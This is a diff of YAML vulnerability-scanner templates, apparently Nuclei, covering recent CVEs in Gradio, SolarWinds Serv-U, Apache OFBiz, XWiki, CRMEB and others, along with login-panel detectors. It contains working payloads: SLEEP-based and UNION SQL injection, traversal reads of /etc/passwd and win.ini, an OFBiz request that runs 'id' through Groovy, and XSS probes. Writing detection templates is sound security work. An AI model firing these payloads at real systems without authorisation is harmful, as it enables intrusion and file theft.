{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
@ -2426,6 +2432,7 @@
{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
{"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"}
{"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the cnt and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"}
{"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"}
{"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"}
{"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"}
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}

View File

@ -1 +1 @@
ccfb062d74fe49f673c3566b7bedbb47
5bf79d4f9b6c31dc26f1ae2f9acb7675

View File

@ -0,0 +1,50 @@
id: time-based-sqli
info:
name: Time-Based Blind SQL Injection
author: 0xKayala
severity: critical
description: |
This Template detects time-based Blind SQL Injection vulnerability
tags: sqli,dast,time-based,blind
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- "duration<=7"
- raw:
- |
@timeout: 20s
GET / HTTP/1.1
Host: {{Hostname}}
payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "duration>=7 && duration <=16"
# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950

View File

@ -1,8 +1,8 @@
id: reflected-xss
info:
name: Reflected Cross Site Scripting
author: pdteam
name: Reflected Cross-Site Scripting
author: pdteam,0xKayala
severity: medium
metadata:
max-request: 1
@ -19,7 +19,9 @@ http:
payloads:
reflection:
- "'\"><{{first}}"
- "'\"><{{first}}>"
- "'><{{first}}>"
- "\"><{{first}}>"
fuzzing:
- part: query
@ -40,4 +42,4 @@ http:
part: header
words:
- "text/html"
# digest: 4a0a0047304502205821d73014fc8d11f73cd6310b813fe726e0a079b64f64e68b4ec264862ca17e0221008b5588348307f431509fb585b4920dc44a9de1f9330154b012be8dc4520fd47d:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100fe9d1b6a33bc101017c0dabac57b282164ad7a316747fb641b1be7dd534178b2022100b1b90ca968e766279c306212b849ce875ae2beaced34248794387b56192c1878:922c64590222798bb761d5b6d8e72950

View File

@ -1964,6 +1964,8 @@ x-from
X-Fruit
X-Fully-Authenticated
X-Furcadia-Allow-Caching
x-functions-key
x-functions-clientid
x-fv
X-Galleries
X-Gallery-Type

97824
helpers/wordlists/params.txt Normal file

File diff suppressed because it is too large Load Diff

View File

@ -48,7 +48,13 @@ http:
regex:
- (?mi)window\.location\.replace\(".*alert\(1337\)
- type: word
part: body
words:
- window.location.href.indexOf
negative: true
- type: status
status:
- 200
# digest: 4b0a00483046022100ecd7675c422b5c9949a8ab6d201f35ee87e4502aad45359f825eb31c2f2fbd72022100aa92159e5d4b1010b07101e6b6f47d858170d3f8e97aa5db3c6c7a259bfe4b71:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502201c457a2f1b36aa9047f64d583625469bc74369b0b7e4aabe3b116e0738efe55c0221009fbcbd6ae813de05fe1f4fcd785a0cb566dba7d3d8f3ed26faf9555b57561095:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,54 @@
id: CVE-2021-43831
info:
name: Gradio < 2.5.0 - Arbitrary File Read
author: isacaya
severity: high
description: |
Files on the host computer can be accessed from the Gradio interface
impact: |
An attacker would be able to view the contents of a file on the computer.
remediation: |
Update to version 2.5.0.
reference:
- https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr
- https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
cve-id: CVE-2021-43831
cwe-id: CWE-22
epss-score: 0.00063
epss-percentile: 0.26511
cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
metadata:
vendor: gradio_project
product: gradio
framework: python
shodan-query: title:"Gradio"
tags: cve,cve2021,lfi,gradio
http:
- method: GET
path:
- "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"
payloads:
path:
- /etc/passwd
- /windows/win.ini
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 200
# digest: 490a00463044022032ecd11c32d5ba5b3a614d6572928a93718eecf820b73a7ed7613c012085b9af02207bceba36fe78c3968f2ca537e592c5f1c5e3aee5a141a64a0d7a9932c9f3af4d:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,42 @@
id: CVE-2023-32068
info:
name: XWiki - Open Redirect
author: ritikchaddha
severity: medium
description: |
XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.
impact: |
An attacker can craft malicious URLs to redirect users to malicious websites.
remediation: |
Implement proper input validation and sanitize user-controlled input to prevent open redirect vulnerabilities.
reference:
- https://jira.xwiki.org/browse/XWIKI-20096
- https://nvd.nist.gov/vuln/detail/CVE-2023-32068
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-32068
cwe-id: CWE-601
epss-score: 0.00149
epss-percentile: 0.50372
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2023,xwiki,redirect
http:
- method: GET
path:
- "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
# digest: 490a00463044022022611f58439e1b8aa2bf5df976f3774aa14e202e26280efda8267481141f80de022050cc9f2a7c4906ef5bc096ec3ca0ccad1892f139eae285db8a964bd5a5b11f7d:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,84 @@
id: CVE-2023-51449
info:
name: Gradio Hugging Face - Local File Inclusion
author: nvn1729
severity: high
description: |
Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
reference:
- https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
- https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
- https://nvd.nist.gov/vuln/detail/CVE-2023-51449
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-51449
cwe-id: CWE-22
epss-score: 0.00064
epss-percentile: 0.27836
cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
metadata:
verified: true
max-request: 2
vendor: gradio_project
product: gradio
framework: python
shodan-query: html:"__gradio_mode__"
fofa-query: body="__gradio_mode__"
tags: cve,cve2024,lfi,gradio,unauth,intrusive
variables:
str: '{{rand_base(8)}}'
http:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
-----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
Content-Type: application/octet-stream
{{str}}
-----------------------------250033711231076532771336998311--
- |
GET /file={{download_path}}{{path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: download_path
internal: true
group: 1
regex:
- "\\[\"(.+)okmijnuhbygv\"\\]"
payloads:
path:
- ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
- ../../../../../../../../../../../../../../../etc/passwd
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 490a0046304402202afd5a76a8709b9e353a87ab56a8aef3d1afa2739156058f4a7cd46c851390400220687bf99017b86a6013b449d53d1c9b790e8e7b4ba7aec6fe2292b87a11d4527c:922c64590222798bb761d5b6d8e72950

View File

@ -1,11 +1,11 @@
id: CVE-2024-1561
info:
name: Gradio Applications - Local File Read
author: Diablo
name: Gradio 4.3-4.12 - Local File Read
author: nvn1729,Diablo
severity: high
description: |
Local file read by calling arbitrary methods of Components class
Local file read by calling arbitrary methods of Components class between Gradio versions 4.3-4.12
impact: |
Successful exploitation of this vulnerability could allow an attacker to read files on the server
remediation: |
@ -16,6 +16,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
- https://www.gradio.app/changelog#4-13-0
- https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -25,50 +26,52 @@ info:
epss-percentile: 0.36659
metadata:
verified: true
max-request: 3
max-request: 2
shodan-query: html:"__gradio_mode__"
tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /config HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: first-component
part: body
group: 1
json:
- '.components[0].id'
internal: true
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
{"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaaaaaaa"}
- |
GET /file={{download_path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: tmpath
regex:
- \/[a-zA-Z0-9\/]+
part: body
name: download_path
internal: true
group: 1
regex:
- "\"?([^\"]+)"
- raw:
- |
GET /file={{tmpath}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- c:\\windows\\win.ini
- /etc/passwd
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- 'contains(header, "text/plain")'
condition: and
# digest: 490a004630440220228b8f9ed4c8b48faa786cd1c48413831ef219341e029831e13f0a25f92be8a902204ff8d692224fa018c063b78b72507ddf2e92f2a750fd3b5cd0c01bc2f32a762f:922c64590222798bb761d5b6d8e72950
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200

View File

@ -0,0 +1,74 @@
id: CVE-2024-1728
info:
name: Gradio > 4.19.1 UploadButton - Path Traversal
author: isacaya
severity: high
description: |
gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.
impact: |
Attackers can exploit this vulnerability to read arbitrary files on the filesystem, such as private SSH keys, by manipulating the file path in the request to the `/queue/join` endpoint. This issue could potentially lead to remote code execution. The vulnerability is present in the handling of file upload paths, allowing attackers to redirect file uploads to unintended locations on the server.
remediation: |
Update to version 4.19.2.
reference:
- https://github.com/gradio-app/gradio/commit/16fbe9cd0cffa9f2a824a0165beb43446114eec7
- https://huntr.com/bounties/9bb33b71-7995-425d-91cc-2c2a2f2a068a
- https://nvd.nist.gov/vuln/detail/CVE-2024-1728
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1728
cwe-id: CWE-22
epss-score: 0.00044
epss-percentile: 0.10164
metadata:
max-request: 5
verified: true
vendor: gradio
product: gradio
shodan-query: html:"__gradio_mode__"
tags: cve,cve2024,lfi,gradio,intrusive
http:
- raw:
- |
POST /queue/join? HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"data":[[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/markdown"}]],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"}
- |
GET /queue/data?session_hash={{randstr}} HTTP/1.1
Host: {{Hostname}}
- |
GET /file={{extracted_path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: extracted_path
regex:
- "/tmp/gradio/.*/passwd"
- "C:.*\\win\\.ini"
internal: true
payloads:
path:
- /etc/passwd
- /windows/win.ini
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 200
# digest: 4a0a0047304502200f825f20fad4b54e4c1edb052482ff3d57c02b63e05a9cf6227b37d39ebee112022100b36cc92a5b2685c8da867167fa0fdc31e99e6d9d6a461ff14467d518c3904dc2:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,43 @@
id: CVE-2024-2621
info:
name: Fujian Kelixin Communication - Command Injection
author: DhiyaneshDk
severity: medium
description: |
A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php.
reference:
- https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-pwd_update.php.pdf
- https://vuldb.com/?ctiid.257198
- https://vuldb.com/?id.257198
- https://github.com/NaInSec/CVE-LIST
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-2621
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
cvss-score: 6.3
cve-id: CVE-2024-2621
cwe-id: CWE-89
epss-score: 0.00045
epss-percentile: 0.15047
metadata:
verified: true
max-request: 1
fofa-query: body="app/structure/departments.php" || app="指挥调度管理平台"
tags: cve,cve2024,sqli,fujian,rce
http:
- raw:
- |
@timeout 15s
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains_all(body,"msg\":","header\":","code\":")'
condition: and
# digest: 4a0a00473045022100a52b0c5b76efaf890e2a47563d494a96fce85d7358a34a0b2ed4027e0dc1c2d202206721b9c12ec93f014b0111b14d53ef8e69c79a19ec1eb23f367c7823881fcd2f:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,53 @@
id: CVE-2024-28995
info:
name: SolarWinds Serv-U - Directory Traversal
author: DhiyaneshDK
severity: high
description: |
SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.
reference:
- https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
- https://nvd.nist.gov/vuln/detail/CVE-2024-28995
- https://x.com/stephenfewer/status/1801191416741130575
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-28995
cwe-id: CWE-22
cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: solarwinds
product: serv-u
shodan-query: html:"Serv-U"
fofa-query: server="Serv-U"
tags: cve,cve2024,lfi,solarwinds,serv-u
http:
- raw:
- |
GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
Host: {{Hostname}}
- |
GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: dsl
dsl:
- 'contains(header, "Serv-U")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100f7464125ccd5146080c76c675872c18c8bd0eb548bb8b1ba0cb9a979e4a8db9b02204c5cfd2b1ac281a288ed84c4fe0fe06376db38e710553793adf0216811a0a537:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,41 @@
id: CVE-2024-31750
info:
name: F-logic DataCube3 - SQL Injection
author: DhiyaneshDK
severity: high
description: |
SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter.
reference:
- https://github.com/lampSEC/semcms/blob/main/datacube3.md
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/DataCube3%20getting_index_data.php%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
- https://nvd.nist.gov/vuln/detail/CVE-2024-31750
- https://github.com/wjlin0/poc-doc
- https://github.com/wy876/POC
classification:
cve-id: CVE-2024-31750
epss-score: 0.00043
epss-percentile: 0.0866
metadata:
verified: true
max-request: 1
fofa-query: title="DataCube3"
tags: cve,cve2024,datacube3,sqli
http:
- raw:
- |
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
req_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG
matchers:
- type: dsl
dsl:
- 'contains(body, "qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq")'
- 'contains(header, "application/json")'
- 'status_code==200'
condition: and
# digest: 4a0a00473045022100debf69f7baa1e23b7f3488c09e93e1909abfdc7a1ea2603f6dba2cb9c703544302203d8ecbf6c297515767d7ed66820e5a80fda576b6ed82be4d00362838d096b5bc:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,49 @@
id: CVE-2024-32113
info:
name: Apache OFBiz Directory Traversal - Remote Code Execution
author: DhiyaneshDK
severity: high
description: |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13
remediation: |
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
reference:
- https://issues.apache.org/jira/browse/OFBIZ-13006
- https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd
- https://ofbiz.apache.org/download.html
- https://ofbiz.apache.org/security.html
- https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit
- https://nvd.nist.gov/vuln/detail/CVE-2024-32113
classification:
cve-id: CVE-2024-32113
epss-score: 0.00115
epss-percentile: 0.45112
metadata:
verified: true
max-request: 1
fofa-query: app="Apache_OFBiz"
tags: cve,cve2024,apache,obiz,rce
http:
- raw:
- |
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "java.lang.Exception:"
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100b88041381f7eeda038aa86589d4e8abaa41ddf477aafea6cd9271bdafa02ebb6022100dfb966a119b54853c7b4d4ea44205600d7bf2227910f32cd964a08a2cf91571d:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,38 @@
id: CVE-2024-3274
info:
name: D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure
author: DhiyaneshDk
severity: medium
description: |
A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.
reference:
- https://github.com/netsecfish/info_cgi
- https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383
- https://nvd.nist.gov/vuln/detail/CVE-2024-3274
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-3274
cwe-id: CWE-200
epss-score: 0.00045
epss-percentile: 0.15047
metadata:
verified: true
max-request: 1
fofa-query: body="Text:In order to access the ShareCenter"
tags: cve,cve2024,dlink,exposure
http:
- raw:
- |
GET /cgi-bin/info.cgi HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Model=", "Build=", "Macaddr=")'
- 'status_code == 200'
condition: and
# digest: 490a004630440220637a70951ffd4c3d81671b37a51e678c922a409e791bdbb538ad6cce7bb84fad0220303256e098c2a99c41e54b1518da46ac7d1910401c97102c6afaa5f2490973d9:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,43 @@
id: CVE-2024-36837
info:
name: CRMEB v.5.2.2 - SQL Injection
author: DhiyaneshDk
severity: high
description: |
SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.
reference:
- https://github.com/phtcloud-dev/CVE-2024-36837
- https://nvd.nist.gov/vuln/detail/CVE-2024-36837
metadata:
verified: true
max-request: 1
fofa-query: title="CRMEB"
tags: cve,cve2024,crmeb,sqli
variables:
num: "{{rand_int(9000000, 9999999)}}"
http:
- method: GET
path:
- "{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{md5(num)}}"
- "SQLSTATE"
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950

View File

@ -2,7 +2,7 @@ id: ibm-note-login
info:
name: IBM iNotes Login Panel - Detect
author: dhiyaneshDK
author: dhiyaneshDK,righettod
severity: info
description: IBM iNotes login panel was detected.
reference:
@ -14,22 +14,28 @@ info:
metadata:
max-request: 2
vendor: ibm
shodan-query: http.title:"IBM iNotes Login"
product: inotes
tags: ibm,edb,panel
tags: ibm,edb,panel,login,detect
http:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/names.nsf'
- '{{BaseURL}}/webredir.nsf'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '<title>IBM iNotes Login</title>'
- 'Lotus iNotes Login Screen'
condition: or
- type: status
status:
- 200
# digest: 4a0a004730450220625a17ef31b35dda3592e49539d8304cc60542ca9c8d2ec4f5509568cd46f673022100f22616c9c57ba6f9ea927df6ff590fcbeb9eb33d5a1afcf66c6dd0afe77f2d7d:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100a019cfe0aba9fc651490032a791ac8c3fc7f5b9ee782c44e122161c3698cc039022100c97e7c7c28a69a32b3a4fbc73ab34d5599f81a8c34d85e266347905e4da0df9a:922c64590222798bb761d5b6d8e72950

View File

@ -2,7 +2,7 @@ id: ibm-security-access-manager
info:
name: IBM Security Access Manager Login Panel - Detect
author: geeknik
author: geeknik,righettod
severity: info
description: IBM Security Access Manager login panel was detected.
reference:
@ -14,8 +14,9 @@ info:
metadata:
max-request: 1
vendor: ibm
shodan-query: http.title:"IBM Security Access Manager"
product: security_access_manager
tags: panel,ibm
tags: panel,ibm,login,detect
http:
- method: GET
@ -27,7 +28,9 @@ http:
- type: word
words:
- "<title>IBM Security Access Manager</title>"
- "IBM Security <em>Access Manager</em>"
part: body
condition: or
- type: word
words:
@ -40,4 +43,4 @@ http:
- "/mga/sps/authsvc/policy/forgot_password"
part: body
condition: and
# digest: 4a0a00473045022100b3c31b972a1af3fbf321e8d2fad135f3c60e69ab84023684e3bdc1903e0a3f75022016212bd0980f645527268ebe265aed9838f5fe47d1fd9a37ffbac227e5765894:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c816b86e40021cbe5ef080a1ebc36d14d60604fc4f2c7deb3f6094655b03ed26022100fa945950ba3d39b400e461e14e07ed6ed86b1b31fd9c7d2e2925cb752f4df0cf:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,33 @@
id: turnkey-lamp-panel
info:
name: TurnKey LAMP Panel - Detect
author: ritikchaddha
severity: info
description: |
TurnKey LAMP Control Panel was detected.
reference:
- https://www.turnkeylinux.org/lamp
metadata:
max-request: 1
verified: true
shodan-query: title:"TurnKey LAMP"
fofa-query: title="TurnKey LAMP"
tags: panel,login,turnkey,lamp,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "TurnKey LAMP</title>"
- type: status
status:
- 200
# digest: 4b0a004830460221008e88f309cb2b1e984efcb8d583f2474a3bb35485e4cb1ce1465533744bfc7f810221009649f52bc1dbea811b3eccf48f2df29d0d3e1e4c6bda50f7e0f405248148c0d6:922c64590222798bb761d5b6d8e72950

View File

@ -30,10 +30,18 @@ http:
words:
- application/xml
- type: word
part: header
words:
- "x-goog-metageneration"
- "x-goog-generation"
case-insensitive: true
negative: true
extractors:
- type: regex
part: body
group: 1
regex:
- '<Name>([a-z0-9-._]+)'
# digest: 4a0a004730450221008d3e2a3f2b51e293c931760a955f03b3fefa01df69177a3d7403db90accb33b402201a4fcc8481d353ec5ac6f5fdb08d85360d3facda2b3623b16e95f5ac517859a3:922c64590222798bb761d5b6d8e72950
